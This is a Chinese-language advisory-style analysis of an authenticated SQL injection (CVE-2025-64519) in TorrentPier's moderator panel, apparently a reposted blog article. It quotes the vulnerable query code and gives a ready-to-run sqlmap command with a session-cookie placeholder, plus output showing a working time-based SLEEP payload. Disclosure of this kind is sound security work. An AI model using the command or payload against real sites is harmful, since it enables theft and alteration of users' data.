TorrentPier 认证 SQL 注入漏洞分析（CVE-2025-64519）

漏洞概述

TorrentPier 论坛软件的管理员控制面板（modcp.php）存在认证 SQL 注入漏洞。拥有版主权限的用户可通过提交恶意的 topic_id（t 参数）利用此漏洞，执行任意 SQL 查询，可能导致数据库中的数据被泄露、修改或删除。

漏洞详情

该漏洞在 modcp.php 处理包含 topic_id（t 参数）的请求时触发。$topic_id 的值直接来自用户输入，在拼接到 SQL 查询之前未进行适当的清理或参数化处理。

漏洞代码位置

在 modcp.php 的第 111-122 行存在易受攻击的代码块：

if ($topic_id) {    $sql = "    SELECT      f.forum_id, f.forum_name, f.forum_topics, f.self_moderated,      t.topic_first_post_id, t.topic_poster    FROM " . BB_TOPICS . " t, " . BB_FORUMS . " f    WHERE t.topic_id = $topic_id      AND f.forum_id = t.forum_id    LIMIT 1  ";
    if (!$topic_row = DB()->fetch_row($sql)) {        bb_die($lang['INVALID_TOPIC_ID_DB']);    }    // ...}

在WHERE t.topic_id = $topic_id子句中，$topic_id 变量直接嵌入到查询字符串中。攻击者可以向 t 参数注入 SQL 语法（如布尔逻辑、基于时间的函数）来操纵查询执行。

漏洞复现

这是一个基于时间的盲 SQL 注入漏洞，需要版主权限才能利用。

前提条件

• 运行的 TorrentPier 实例

• 具有版主权限的账户

复现步骤

1. 以版主身份登录

2. 从浏览器开发者工具获取完整的会话 cookie 字符串

3. 使用 sqlmap 自动化利用漏洞

sqlmap 命令

sqlmap -u "https://localhost/modcp.php?mode=lock&t=1" -p t --cookie "your_full_cookie_string" --dbms mysql --technique T --current-db

确认输出

sqlmap 的以下输出确认漏洞利用成功：

Parameter: t (GET)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: mode=lock&t=1 AND (SELECT 9461 FROM (SELECT(SLEEP(5)))KxhM)    [INFO] the back-end DBMS is MySQL[INFO] fetching current database[INFO] retrieved: torrentpiercurrent database: 'torrentpier'

影响分析

这是一个认证 SQL 注入漏洞，虽然需要版主权限，但仍然具有严重性。恶意或被入侵的版主账户可利用此漏洞：

• 读取敏感数据：从数据库中提取任何信息，包括用户凭证（密码哈希）、私信、电子邮件地址和其他私人数据

• 修改数据：更改数据库中的记录，如将自身或其他用户的权限提升至管理员级别

• 删除数据：通过删除表或记录来破坏或销毁论坛数据

技术规格

• 受影响版本：<= 2.8.8

• 修复版本：无

• CVSS 评分：8.8（高危）

• 弱点类型：CWE-89 SQL 注入

参考信息

• GHSA-4rwr-8c3m-55f6

• torrentpier/torrentpier@6a0f649 更多精彩内容 请关注我的个人公众号 公众号（办公 AI 智能小助手）对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号（网络安全技术点滴分享）

公众号二维码

办公AI智能小助手

公众号二维码

网络安全技术点滴分享